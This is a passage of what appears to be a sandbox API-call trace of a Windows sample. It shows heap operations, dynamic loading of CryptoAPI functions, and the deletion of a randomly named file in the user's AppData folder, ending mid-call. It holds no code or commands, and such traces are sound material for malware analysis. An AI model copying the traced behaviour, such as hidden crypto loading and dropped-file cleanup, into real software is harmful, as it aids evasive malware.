CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0232.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.479] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0232.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0232.480] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0232.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.480] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0232.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0232.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.481] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0232.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0232.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.481] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0232.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0232.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0232.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0232.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0232.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0232.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0232.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69888, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0232.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0232.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0232.483] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0232.484] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.484] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.485] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.485] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0232.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.485] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0232.485] FreeLibrary (hLibModule=0x756e0000) returned 1 [0232.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0232.485] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0232.485] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0232.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0232.485] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.486] CloseHandle (hObject=0x2a0) returned 1 [0232.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0232.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0232.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0232.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0232.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0232.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.549] CloseHandle (hObject=0x2d0) returned 1 [0232.554] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.556] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.556] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0232.556] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Hr9y61oAkM-K.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Hr9y61oAkM-K.flv", lpFilePart=0x8cedf4*="Hr9y61oAkM-K.flv") returned 0x30 [0232.556] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Hr9y61oAkM-K.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\hr9y61oakm-k.flv")) returned 0x20 [0232.557] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Hr9y61oAkM-K.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b122980, ftCreationTime.dwHighDateTime=0x1d5ed6b, ftLastAccessTime.dwLowDateTime=0x6a09f990, ftLastAccessTime.dwHighDateTime=0x1d5e0c7, ftLastWriteTime.dwLowDateTime=0x6a09f990, ftLastWriteTime.dwHighDateTime=0x1d5e0c7, nFileSizeHigh=0x0, nFileSizeLow=0x140f4, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Hr9y61oAkM-K.flv", cAlternateFileName="HR9Y61~1.FLV")) returned 0xa87050 [0232.557] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Hr9y61oAkM-K.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\hr9y61oakm-k.flv")) returned 1 [0232.645] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b122980, ftCreationTime.dwHighDateTime=0x1d5ed6b, ftLastAccessTime.dwLowDateTime=0x6a09f990, ftLastAccessTime.dwHighDateTime=0x1d5e0c7, ftLastWriteTime.dwLowDateTime=0x6a09f990, ftLastWriteTime.dwHighDateTime=0x1d5e0c7, nFileSizeHigh=0x0, nFileSizeLow=0x140f4, dwReserved0=0x1, dwReserved1=0x1c, cFileName="Hr9y61oAkM-K.flv", cAlternateFileName="HR9Y61~1.FLV")) returned 0 [0232.645] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0232.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0232.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0232.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0232.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0232.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0232.646] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0232.646] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0232.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0232.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0232.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0232.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0232.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0232.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x62) returned 0x2e564e0 [0232.647] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Hr9y61oAkM-K.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Hr9y61oAkM-K.flv", lpFilePart=0x8cf650*="Hr9y61oAkM-K.flv") returned 0x30 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0232.647] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Hr9y61oAkM-K.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\hr9y61oakm-k.flv")) returned 0xffffffff [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0232.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0232.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0232.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0232.648] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0232.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0232.648] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 